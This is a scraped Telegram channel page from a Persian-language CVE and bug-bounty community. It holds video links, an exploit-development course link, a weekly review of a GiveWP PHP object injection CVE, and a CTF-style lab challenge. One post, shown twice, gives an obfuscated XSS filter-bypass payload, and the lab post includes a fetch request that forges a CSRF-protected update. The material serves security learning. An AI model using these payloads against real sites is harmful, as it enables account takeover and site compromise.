GO-TO CVE – Telegram
GO-TO CVE
3.25K subscribers
415 photos
58 videos
234 files
974 links
Hello and welcome to the channel! Every week, we dive deep into a new CVE and share our analysis here. I’d love for you to follow us on social media.

Join our chat on Telegram via the link below: https://news.1rj.ru/str/gotocvechat

Secured by = 🧿
Download Telegram
Forwarded from Bugbountyhints
یه لیست از ویدیو های zseano که آماده کردم ببینمشون :‌

https://www.youtube.com/watch?v=8Sqp_kryB4E : live recon nahamsec with zseano
https://www.youtube.com/watch?v=-6tv1kvBZDQ : live mentoring 3h
https://www.youtube.com/watch?v=lfdLJIwgyOY : Mindset
https://www.youtube.com/watch?v=8U6bWXDCUjU&t=201s : live hacking on bugbounty notes
https://www.youtube.com/watch?v=jtFlbUUKL1Y : understanding and bypass fileters
https://www.youtube.com/watch?v=0jYeaFmivrY : presentation 1h
https://www.youtube.com/watch?v=fcAklNSta-U : nahamcon 2022
https://www.youtube.com/watch?v=us15nL2Hm2w&pp=ygUGenNlYW5v : staying sane in bugbounty
https://www.youtube.com/watch?v=UH6O13hHf5M : nahamsec with zseano recon,waf,javanoscript
15🔥1
Forwarded from OS Internals (Abolfazl Kazemi)
📢🐧 مخزن دوره‌ی Linux Exploit Development روی گیت‌هاب ایجاد شد.

از این به بعد همه‌ی منابع و فایل‌های کمکی دوره از طریق این مخزن منتشر می‌شن.

📂 لینک مخزن:
👉 https://github.com/akazemi67/Linux-Exploit-Development-Course

⚠️ ویدئوها به زبان فارسی هستن و مستندات مخزن به زبان انگلیسی آماده شدن.

#linux #exploitdev #GitHub
🔥3
Forwarded from BugBounty & Hacking Resources (Shopen)
Another XSS Payload:

{document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>')


https://x.com/hoseinshurabi/status/1960794897465926038
8
This media is not supported in your browser
VIEW IN TELEGRAM
فردا CVE چی میخواید براتون exploit کنم ؟؟ 😂 چیز سخت نگید امتحان دارم
Forwarded from BugBounty & Hacking Resources (Shopen)
🆘 رفقا اینو میتونید حل کنید:
https://lab.jsecurity.ir/lab2/

راه حل های خلاقانه تون رو میخوام بزارم توی هفته نامه Jsecurity .

داستانش اینه که CSRF توی کلوژر گیرکرده، و شما بایستی اونو بدست بیارید و درخواست بزنید به /update و فلگ رو توی صفحه چاپ کنید.

یه پارامتر q داره که به xss آسیب پذیره.

اپدیت: برای دیدن فلگ هم میتونید پاسخ اینو ببینید

await fetch("https://lab.jsecurity.ir/lab2/update", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": "_csrf=5yuyw85r-R_--IWCQfIFOE68dIE6QWdhrUWg&data=pwned",
    "method": "POST",
    "mode": "cors"
});
👍1
Forwarded from BugBounty & Hacking Resources (Shopen)
Another XSS Payload:

{document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>')


https://x.com/hoseinshurabi/status/1960794897465926038
کلاه برداری خالص
🤣9
CVE-2024-12877-week-66.pdf
1002 KB
🎯 CVE-2024-12877 Review – GiveWP goes unserialize()… Hello RCE! ⚡️🔥
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻

This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘

🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)

📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.

👾 What’s the impact?

Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️‍♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️

💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.

📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE

#week_66
🔥83👍2👏1
GO-TO CVE pinned a file
بریم دیگه الکترو مغناطیس بخونیم که وضعیت خرابه 😂
😁1
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
👍1